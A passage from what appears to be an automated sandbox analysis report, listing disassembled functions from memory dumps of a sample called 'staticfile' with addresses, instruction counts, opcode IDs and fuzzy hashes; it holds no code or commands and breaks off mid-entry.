                    • Instruction ID: 72ee9e9618c29168d6a8a6e5fa190193a4b0742aede59b7f63774cf5ec447902
                    • Opcode Fuzzy Hash: c95ff66d8637e04e69a854d47020a3b4b805471692a11302a278a9162c5f65ad
                    • Instruction Fuzzy Hash: 7271E070D19A2C9FDBA5EF58C894BE9B7F1FB58310F5001AAD00DE7291DB35AA84CB44
                    Function 00007FF848F160C5 Relevance: .2, Instructions: 187COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26052fdf75b8198429601573499270664fc9d0f409c7ead09988c006052bcdd2
                    • Instruction ID: 4e027b611927da21ee0c6b3c464215610d0a0e46a699935ffb66a42d18379938
                    • Opcode Fuzzy Hash: 26052fdf75b8198429601573499270664fc9d0f409c7ead09988c006052bcdd2
                    • Instruction Fuzzy Hash: BC517871C0C6598FEB95EB6888943A8BBB1FF55340F4441BAC009E72C6DB3C6C85CB41
                    Function 00007FF848F14611 Relevance: .2, Instructions: 171COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 922715370ee262ee1be702666be7fd519dcabb77636ed692d8e3de7eb7e15e56
                    • Instruction ID: 1ae046b208a86366826ca7783c5f9fd8acb11b4b723f2a30d35483450dca7801
                    • Opcode Fuzzy Hash: 922715370ee262ee1be702666be7fd519dcabb77636ed692d8e3de7eb7e15e56
                    • Instruction Fuzzy Hash: C651B370D19A1D9FDB94EF98D899BADBBB1FF68301F10016AD00DE7291DB386841CB44
                    Function 00007FF848F10AB9 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 358189c5a58763beec3f9c9a8d81e58a285f07ba99d6a6c4485572b498f2ef0b
                    • Instruction ID: 012d94bb508c2f0d532880340ac8cb2a0652b7d0b208a198e25e2421215fc8f6
                    • Opcode Fuzzy Hash: 358189c5a58763beec3f9c9a8d81e58a285f07ba99d6a6c4485572b498f2ef0b
                    • Instruction Fuzzy Hash: 7D51D870E18A5D8FDF98EF98C8996EDBBB1FFA8341F14012AD409E7295CB349845CB44
                    Function 00007FF848F138B8 Relevance: .2, Instructions: 151COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf4f64dccd48301f168660eb06adf379b1bc0dcf599a9972dfba5b0c4c753ff0
                    • Instruction ID: 992e11739fcb825477472e26648845c3a988196848ae7ee747e905b30e754072
                    • Opcode Fuzzy Hash: bf4f64dccd48301f168660eb06adf379b1bc0dcf599a9972dfba5b0c4c753ff0
                    • Instruction Fuzzy Hash: 87417970E1991D9FDB48EF98D854AEEBBB1FF58340F10017AE00AE7281DB39AD018B55
                    Function 00007FF848F167ED Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5fa5640c2bca1eb00e761ad782363a21ffb900572acaf3a860a0bdf0621f6a2e
                    • Instruction ID: 0f5700aaed53448da33aed7c2ed703337bbb5c602a5fa16a4511118508758ec3
                    • Opcode Fuzzy Hash: 5fa5640c2bca1eb00e761ad782363a21ffb900572acaf3a860a0bdf0621f6a2e
                    • Instruction Fuzzy Hash: 04516831C0D68A8FDB55AB6898682FE7BB0FF16311F1501BAD005E71D2EB385E48CB52
                    Function 00007FF848F1535F Relevance: .1, Instructions: 135COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 61726e0fcbca92c9643ba6288765e33b28edac4dd7d7bf682e8428a475b56f2f
                    • Instruction ID: ff9704665755e774a390dd1265eb502c19b2c638ea900fd620a97a880e3fd3f4
                    • Opcode Fuzzy Hash: 61726e0fcbca92c9643ba6288765e33b28edac4dd7d7bf682e8428a475b56f2f
                    • Instruction Fuzzy Hash: D541D870D1895D9FDF94EBA8D895AACBBF1FF68341F50016AD00DE7296DB34A881CB40
                    Function 00007FF848F10C6D Relevance: .1, Instructions: 125COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 23ac26049bf9921517769ca23c2d0de1e62f42d61e5a6602de6731922be7a2ef
                    • Instruction ID: e971e6c573d30460e9acfae9f8529f7be051826afdee4ca7f38cecc108e432c5
                    • Opcode Fuzzy Hash: 23ac26049bf9921517769ca23c2d0de1e62f42d61e5a6602de6731922be7a2ef
                    • Instruction Fuzzy Hash: 76411471C0962D8FDB90FFA8D4586EDBBB0FF55340F50046AE409E3292DB78A945CB84
                    Function 00007FF848F11521 Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad2f0885124b4df47731431f6ed527fc8c0178c409955862e4f30f8a8e5bfe08
                    • Instruction ID: 4f5f67aa0fe19116667d4f4be1ed83b827f0af9d96e2c2f638db2a949ad38d79
                    • Opcode Fuzzy Hash: ad2f0885124b4df47731431f6ed527fc8c0178c409955862e4f30f8a8e5bfe08
                    • Instruction Fuzzy Hash: 9541E534A1891D8FDB98EB58C895BACB7F1FB58304F5440A9D04EE3692DF75AD818B40
                    Function 00007FF848F10AD0 Relevance: .1, Instructions: 113COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e9df1d85610e7e0763f4968e735b984e9b283a056b08c12c69e51ebb0accf5c7
                    • Instruction ID: 79eb3bd534cc0adaffbf55210ad0169a34fa37c003384ac32fdd1ae6a5286570
                    • Opcode Fuzzy Hash: e9df1d85610e7e0763f4968e735b984e9b283a056b08c12c69e51ebb0accf5c7
                    • Instruction Fuzzy Hash: 5631C970E1891D8FDF94EF58D495BEEBBB1FBA8345F10012AD409E3295CB35A845CB84
                    Function 00007FF848F14BE9 Relevance: .1, Instructions: 105COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 00e8de8629b8fa6d8860b73fd13850ff2ba958cf33202ec9ca4a114d666c5334
                    • Instruction ID: 83ac888a162097755b6ffbbcb87724fb1525ccd34bead6d31edd23818dc35c4b
                    • Opcode Fuzzy Hash: 00e8de8629b8fa6d8860b73fd13850ff2ba958cf33202ec9ca4a114d666c5334
                    • Instruction Fuzzy Hash: 60415970D0D6598FEB56EFA4C8596E9BBF2FF59300F5001BAD009E7292CB395981CB40
                    Function 00007FF848F11129 Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ea89a88cfba50b59ce5e455b6fa8ff35ac559b793726ab6efcaede9d8fb3bed1
                    • Instruction ID: d8f125394193db9e941a95dbf8c0652119626550af3706bea5b770fb58ce3129
                    • Opcode Fuzzy Hash: ea89a88cfba50b59ce5e455b6fa8ff35ac559b793726ab6efcaede9d8fb3bed1
                    • Instruction Fuzzy Hash: 80217C3190895D9FDF81EF68D859AEDBBF5FF58310F00016AE408E3292CB249841C790
                    Function 00007FF848F13A8D Relevance: .1, Instructions: 90COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a32297a41232e235b2da31a7290768419d22a9ca8527315bdbdf2c24f391d48
                    • Instruction ID: 9a1a7894a0cd7f8c77d8ccab3712a03feb300713de9c228ae97812b78f198598
                    • Opcode Fuzzy Hash: 9a32297a41232e235b2da31a7290768419d22a9ca8527315bdbdf2c24f391d48
                    • Instruction Fuzzy Hash: CD21AE31E0DA8A8FE799EB288C647A57BA0FF51341F0804B9D088D71D2DF796C45CB05
                    Function 00007FF848F14555 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5f75391dfd20ad619e6a20245e24b702cdf8d6d475f10d3fd2ca5032b2afcf7d
                    • Instruction ID: 543324e158a20aeeb4da14d16017d506457e64d4a88c00ae17517010b040d982
                    • Opcode Fuzzy Hash: 5f75391dfd20ad619e6a20245e24b702cdf8d6d475f10d3fd2ca5032b2afcf7d
                    • Instruction Fuzzy Hash: BA31E271C1E6C98FE755EF2888541A97FB2FF95340F5501BAE808872D7CB285848C795
                    Function 00007FF848F13F00 Relevance: .1, Instructions: 85COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c026618e3181ed2b53a86b591d2a723d27d159c3b7f9e9eae102f5851f4e0b72
                    • Instruction ID: 03fdd4213e8383bcaa0474391f955f8fcc6c2cf9dc7c183b60786606ab204c12
                    • Opcode Fuzzy Hash: c026618e3181ed2b53a86b591d2a723d27d159c3b7f9e9eae102f5851f4e0b72
                    • Instruction Fuzzy Hash: 48314630D1961A8FE7A8EB28C8593B9B3B2EF94750F1005B9D45DD32D2CF39A8818B44
                    Function 00007FF848F13F0B Relevance: .1, Instructions: 77COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2af2166aece4f07580d22b63f32c980f95b596ec39ea0ca64a06c91e5fcdf616
                    • Instruction ID: ed5e5206ad14ce1d0ccd3b8641a0fb96afb6e111f8f2715060a4d0803c538994
                    • Opcode Fuzzy Hash: 2af2166aece4f07580d22b63f32c980f95b596ec39ea0ca64a06c91e5fcdf616
                    • Instruction Fuzzy Hash: C221BD31D0D20A8EE768AF28C8556B9B3B1EF94790F100079D01D932C2CF39AC81CB08
                    Function 00007FF848F11048 Relevance: .1, Instructions: 74COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8fe7fde6d6743928cd559205bfe78439167d5afe8d76363795189b5e9c7a2bf
                    • Instruction ID: 8b718a0738888807a531490dc9773a6cea41e0480ebadc127dde46f0e9c794b1
                    • Opcode Fuzzy Hash: d8fe7fde6d6743928cd559205bfe78439167d5afe8d76363795189b5e9c7a2bf
                    • Instruction Fuzzy Hash: BB21B270A1890D9FCF84EF48C495EEEBBB1FF68301F100169E509E3255CB34E8418B84
                    Function 00007FF848F13F43 Relevance: .1, Instructions: 73COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6df0096a32ba576641b09c259b65e996351c0e4be2a4132fec044ee697acc16
                    • Instruction ID: b58adcbf66df8b035278004d363a85f4a97932d9f5701317c471a47025363d79
                    • Opcode Fuzzy Hash: e6df0096a32ba576641b09c259b65e996351c0e4be2a4132fec044ee697acc16
                    • Instruction Fuzzy Hash: 3F215B30D0E7494FE769AB68C8197B9BBB1EF95750F0404BAD009D72D2CE389884CB55
                    Function 00007FF848F13FC1 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f23da67866e266d801fb815234f6678855a6c72313d749dd3a34a2f69d0c60db
                    • Instruction ID: d2fc57227c781dc3a8bcdd7eb0a1dc8404783925b6c8a6c3a2a2c3d412c3f078
                    • Opcode Fuzzy Hash: f23da67866e266d801fb815234f6678855a6c72313d749dd3a34a2f69d0c60db
                    • Instruction Fuzzy Hash: 56119D3090E78A4FE766AB7488247B97BB1EF86750F0804BAD049D72D3CE289C45C756
                    Function 00007FF848F13F62 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 251e51a8919b4733fbc261aa8a684bf5c099dd0b1f53f26f09c53bd4ec4bd854
                    • Instruction ID: d27ae30db00bd6653476d3d59dbfec71053d13b77f9ee969b722d2f8fabf74cb
                    • Opcode Fuzzy Hash: 251e51a8919b4733fbc261aa8a684bf5c099dd0b1f53f26f09c53bd4ec4bd854
                    • Instruction Fuzzy Hash: EF119E30C1D60A9FE768AB28C4097BAB6B1EF95790F101539D40DD32C1CF39AC448655
                    Function 00007FF848F13F86 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fd297da374d612f008eb9b74bee7458eab2dc8df74d7b4fe8217c5614f2424d2
                    • Instruction ID: a8e4e909e57b09cee0d1eea9ecb164f6ca637da474f74849cd2534ba117fc081
                    • Opcode Fuzzy Hash: fd297da374d612f008eb9b74bee7458eab2dc8df74d7b4fe8217c5614f2424d2
                    • Instruction Fuzzy Hash: E2113A30D1D64A8EE7A8AF28C4153B966B2EF99790F141439D44D932C6CF39AC81C708
                    Function 00007FF848F13F74 Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e21fa984d004cf722cd16b1ccd2ac2fd6b8fc2548b2695c4edb9fd305050b37d
                    • Instruction ID: e72a59205f33e2cea0214835ddc57ffd7498614fe7c6ca4d75646f0c0090f3bc
                    • Opcode Fuzzy Hash: e21fa984d004cf722cd16b1ccd2ac2fd6b8fc2548b2695c4edb9fd305050b37d
                    • Instruction Fuzzy Hash: A0118B34D1DA4A8EE7A8AF28C4193B9B7B2EF98750F140439D40DE32C2CF39AC418748
                    Function 00007FF848F13EEC Relevance: .1, Instructions: 56COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fedf6f21ffebb360383137de18d09ffa7e6d16f8ec6c13e081c6c06892ccc399
                    • Instruction ID: be6b418aafbbe60c58aea1e96f99f22a0ab15b189964b0f22227d7b8fb51b35e
                    • Opcode Fuzzy Hash: fedf6f21ffebb360383137de18d09ffa7e6d16f8ec6c13e081c6c06892ccc399
                    • Instruction Fuzzy Hash: C211A030C0E74A8FE769AF28C5193B9BBB1EF86750F041479D459D72D2CF39A8408705
                    Function 00007FF848F13F6B Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: baac23d16eebec1297173c4d4b13589fe1828433a1912e68195abaa8e3487300
                    • Instruction ID: 7e8a79d15363921daa08b58405ea7322962f6fb13c6a39fec04dbcc8e7d1a8f5
                    • Opcode Fuzzy Hash: baac23d16eebec1297173c4d4b13589fe1828433a1912e68195abaa8e3487300
                    • Instruction Fuzzy Hash: E7016970D0E64A8FE768AF24C5193B9BBB2EF89B50F041879D009E72D2CF39A8419715
                    Function 00007FF848F16680 Relevance: .0, Instructions: 50COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 049eea79fe012fc1539d2bd39f82a735fb7f0ae4cb546c018470bb10087b9d2c
                    • Instruction ID: a19397ef35928710980c3960567866ef36215dedabbdea48768eaadaab9cfb7d
                    • Opcode Fuzzy Hash: 049eea79fe012fc1539d2bd39f82a735fb7f0ae4cb546c018470bb10087b9d2c
                    • Instruction Fuzzy Hash: B2018C31D4894C8FCB55EF5AAC002D977B4FB9A318F00126AD45CD7180E7759A9AC745
                    Function 00007FF848F110EA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 310dc1e8405177ed607614cece71bd594a61f921676af7b0115392509ce35525
                    • Instruction ID: 1f156f5144f4ee7980bd43c9b75511877568cb9a782f8e1b089b19db2303ce63
                    • Opcode Fuzzy Hash: 310dc1e8405177ed607614cece71bd594a61f921676af7b0115392509ce35525
                    • Instruction Fuzzy Hash: C1E09236D0C94D4FEB90AF68A8066A5FBA4FB86308F000069E55CD3192C7259995C385

                    Executed Functions

                    Function 00007FF848F327F6 Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: [$]
                    • API String ID: 0-2073744556
                    • Opcode ID: e0f8a2fc0be3161891104f18bd6d57525b34b46bc744c3316e971c51d63c7ced
                    • Instruction ID: f2ca12b2de72c029f0608a164e1852f6746197881347641913b939b8d5fb123c
                    • Opcode Fuzzy Hash: e0f8a2fc0be3161891104f18bd6d57525b34b46bc744c3316e971c51d63c7ced
                    • Instruction Fuzzy Hash: 67810870D19A6D8FDBA9EF18C8856A9B7B1FF58341F1041EAD00DE7291CB356A81CF50
                    Function 00007FF848F31751 Relevance: 1.6, Strings: 1, Instructions: 385COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: @JH
                    • API String ID: 0-3316324915
                    • Opcode ID: cc8db8a12fa197c0e8ad8c1937d7e6e5c05adc3d0582df10f670094e48311f45
                    • Instruction ID: e0750ef981e6eeff0d2682ad236e1505d2b70d5e482981af7937900177e07d1e
                    • Opcode Fuzzy Hash: cc8db8a12fa197c0e8ad8c1937d7e6e5c05adc3d0582df10f670094e48311f45
                    • Instruction Fuzzy Hash: 59D18C71C196999FDB98EB68C8557F8BBB1FF55340F1400BAE009E72D2CB386885CB14
                    Function 00007FF848F3124A Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 8b44ec19be4e4032c5d1299d5d7db91599e79a7125ef10e60cd8b8346b714837
                    • Instruction ID: fe47509d000de397c1de0b066bda96767c29271a00c15e57403c1d64ed9fc325
                    • Opcode Fuzzy Hash: 8b44ec19be4e4032c5d1299d5d7db91599e79a7125ef10e60cd8b8346b714837
                    • Instruction Fuzzy Hash: 71A17234A18A1D8FDB98EF58C894BA8B7F1FF69301F5541A9D00DE72A5DB74AD81CB00
                    Function 00007FF848F309D3 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8xH
                    • API String ID: 0-4181425785
                    • Opcode ID: 46b3679197a743b59b4f3279c53e216a5500ee300f5359591da149c1a6929274
                    • Instruction ID: 8f8a287a640383f24818a51601d5e5bcb46124a61f0ccdc7e499744a22d558ea
                    • Opcode Fuzzy Hash: 46b3679197a743b59b4f3279c53e216a5500ee300f5359591da149c1a6929274
                    • Instruction Fuzzy Hash: 43E09A36D1892E8FDB84FB58D8555FC73A1FB94250F010167D44DD7181DB2468158744
                    Function 00007FF848F34843 Relevance: .2, Instructions: 248COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2f01fc2ba5e84f7dc55fc68eae7f3ae74f86c39c16e996c87a2c293f2a17effe
                    • Instruction ID: c1ff802569d61e68ab7e52e6d064ca541c71201db4a8dc05cadb92fedb5cbf1a
                    • Opcode Fuzzy Hash: 2f01fc2ba5e84f7dc55fc68eae7f3ae74f86c39c16e996c87a2c293f2a17effe
                    • Instruction Fuzzy Hash: A591F370D19A1D9FDB94EFA8D845BEDB7B1FF58340F1041AAD00DE3292DB3869858B44
                    Function 00007FF848F34345 Relevance: .2, Instructions: 239COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 032e4b38e77178e1c5df128f66eff774b575c69c26067cee6fbefd0663b33845
                    • Instruction ID: cc09d2702315660ad9a36b2a737dcb3e037766cd1ef7da081ea31553c0e850d6
                    • Opcode Fuzzy Hash: 032e4b38e77178e1c5df128f66eff774b575c69c26067cee6fbefd0663b33845
                    • Instruction Fuzzy Hash: 15812B72C1E6C65FE355ABA8A8110B97FE0FF72794F1800BBD44C871D7DE19A8098399
                    Function 00007FF848F30DD9 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f992fb59faac46c3fc18b565cf14ca32835b81a9b6f79f325ccbe41e62d171ea
                    • Instruction ID: b710b585d6079b70f2667e1ea24d8063457d88e6b79b3922a96c8b571423b57c
                    • Opcode Fuzzy Hash: f992fb59faac46c3fc18b565cf14ca32835b81a9b6f79f325ccbe41e62d171ea
                    • Instruction Fuzzy Hash: CE713C30A1994E9FDB84FF58D895AE9B7F1FF98340F1441A6D409D7296CA38A881CB90
                    Function 00007FF848F308B1 Relevance: .2, Instructions: 201COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000009.00000002.2131721803.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_7ff848f30000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7574dcdb28769c38c9e86a506c7c8ea32e15fe73c7a14709dba9cbe5826e2cd1
                    • Instruction ID: 1477a718a6b8ba4417031b6a14411aa843337f2ed5594b50b29e7893f58c3d5d
